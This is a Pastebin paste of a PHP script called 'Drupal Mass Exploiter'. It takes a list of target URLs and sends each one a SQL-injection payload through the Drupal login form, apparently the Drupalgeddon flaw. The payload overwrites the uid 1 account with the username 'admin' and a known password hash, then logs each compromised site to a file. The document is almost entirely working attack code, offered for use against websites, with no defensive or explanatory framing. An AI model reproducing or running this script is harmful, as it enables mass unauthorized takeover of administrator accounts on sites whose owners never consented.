API tools faq
paste
Advertisement
S4mom

Drupal Mass Exploiter

S4mom
Feb 1st, 2017
1,886
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.00 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. echo'<form method="POST" action="">
  3.        <center>
  4.            <font face="Goudy Stout" color="Blue" size="5"> Drupal Mass Exploiter By Dr.S4mom </font></font><br>
  5.    <form method="GET" action="">
  6. <form method="POST" action="">
  7. <textarea name="urls" cols="50" rows="16" placeholder="http://www.site.com/" ></textarea><br>
  8. <input type="submit" name="submit" value="submit">
  9. </form>
  10. ';
  11. $urls = $_POST['urls'];
  12. $sites = explode("\r\n",$urls);
  13. foreach($sites as $url){
  14. $url =trim($url);
  15.  
  16. $file = fopen("resault.txt", "a");
  17. error_reporting(0);
  18. if (isset($_POST['submit'])) {
  19. //$url = $_POST['url'];
  20. $post_data = "name[0;update users set name %3D 'admin' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  21. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  22. ", 'content' => $post_data));
  23. $ctx = stream_context_create($params);
  24. $data = file_get_contents($url . '/user/login/', null, $ctx);
  25. echo "<h4>Scanning at \"/user/login/</h4>\"";
  26. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  27. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  28. echo "Success! User:admin Pass:admin at {$url}/user/login <br>";
  29. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/resault.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  30. echo "<br><br>";
  31. fwrite($fp, "Succes! User:admin Pass:admin -> {$url}/user/login");
  32. fwrite($fp, "
  33. ");
  34. fwrite($fp, "
  35. ");
  36. fclose($fp);
  37. } else {
  38. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  39. }
  40. }
  41. if (isset($_POST['submit'])) {
  42. //$url = "http://" . $_GET['url'] . "/";
  43. $post_data = "name[0;update users set name %3D 'admin' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  44. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  45. ", 'content' => $post_data));
  46. $ctx = stream_context_create($params);
  47. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  48. echo "<h4>Scanning at \"Index</h4>\"";
  49. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  50. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  51. echo "Success! User:admin Pass:admin at {$url}/user/login <br>";
  52. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/resault.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  53. echo "<br><br>";
  54. fwrite($fp, "Success! User:admin Pass:admin -> {$url}/user/login");
  55. fwrite($fp, "
  56. ");
  57. fwrite($fp, "");
  58. fwrite($fp, "
  59. ");
  60. fclose($fp);
  61. } else {
  62. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  63. echo "<br><br>";
  64. }
  65. }
  66. //==========
  67. }// end foreach
  68.  
  69.  
  70. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!